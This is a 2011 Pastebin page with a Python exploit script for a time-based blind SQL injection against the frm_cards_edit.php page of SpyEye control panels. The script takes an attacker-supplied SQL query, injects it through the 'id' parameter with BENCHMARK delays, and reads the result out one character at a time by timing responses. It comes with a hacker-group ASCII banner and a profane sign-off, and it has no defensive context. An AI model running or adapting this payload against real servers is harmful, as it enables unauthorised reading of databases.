SHARE
TWEET

SpyEye r0073r xpl01t

R00TW0RM Sep 15th, 2011 6,402 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2.  
  3. from httplib import HTTPConnection
  4. from time import time
  5. from sys import exit, argv, stdout
  6. import urllib
  7. print """
  8. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  9. 0             __      __   __                   __                           1
  10. 1           /'__`\ /'__`\/\ \__              /'__`\                        0
  11. 0     _ __ /\ \/\ \/\ \/\ \ \ ,_\ __  __  __/\ \/\ \ _ __    ___ ___       1
  12. 1    /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\    0
  13. 0    \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \   1
  14. 1     \ \_\ \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\  0
  15. 0      \/_/   \/___/  \/___/  \/__/ \/__//__/   \/___/  \/_/  \/_/\/_/\/_/   1
  16. 1                                                                            0
  17. 0                                                                            1
  18. 1                                       >> SpyEye r0073r xpl01t              0
  19. 0                                       >> author : Sanjar Satsura           1
  20. 1                                       >> sanjar[at]xakep[dot]ru            0
  21. 0                                       >> Public v.0.1                      1
  22. 1                                       >> )c(  2011                         0
  23. 0                                                                            1
  24. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
  25.  
  26.  Example:                                                        
  27.  Spyeye_r0073r <host>/dir/"version()"                        
  28.  
  29. """
  30.  
  31. if len(argv)<=3: exit()
  32. else:   print "[+]Started pwn..."
  33.  
  34. host = argv[1]
  35. path = argv[2]
  36. sql = argv[3]
  37. port = 80
  38.  
  39.  
  40. hash = ""
  41. full = []
  42.  
  43. for k in range(48,122):
  44.     full.append(k)
  45. full.append(0)
  46. # full value [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0]
  47. # This is the charset to try
  48.  
  49. delay = 0.5
  50. a=1
  51. while a <= 32:
  52.     for i in full:
  53.         j = 0
  54.         if i == 0:  exit('\n[+]Finished\n')
  55.         #
  56.         start = time()
  57.         # start time for the delay
  58.         conn = HTTPConnection(host,port)
  59.         #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
  60.         values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
  61.         data = urllib.urlencode(values)
  62.         print data
  63.         conn.request("GET", path + "frm_cards_edit.php?" + data )
  64.         response = conn.getresponse()
  65.         read = response.read()    
  66.         print read
  67.          
  68.         if response.status == 404: exit('[+]404')
  69.         #404
  70.         now = time()
  71.         if now - start > delay:
  72.         #has come true then the character is valid
  73.             stdout.write(chr(i))
  74.             stdout.flush()
  75.             hash += chr(i)
  76.             a += 1
  77.             break;
  78.         else: j += 1
  79.         print "i vale %s, y J vale %s" %(i,j)
  80.                
  81.                
  82.                
  83. # w4tch u. h4ck u. fuck u. 1337day
  84. # www.r00tw0rm.com
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top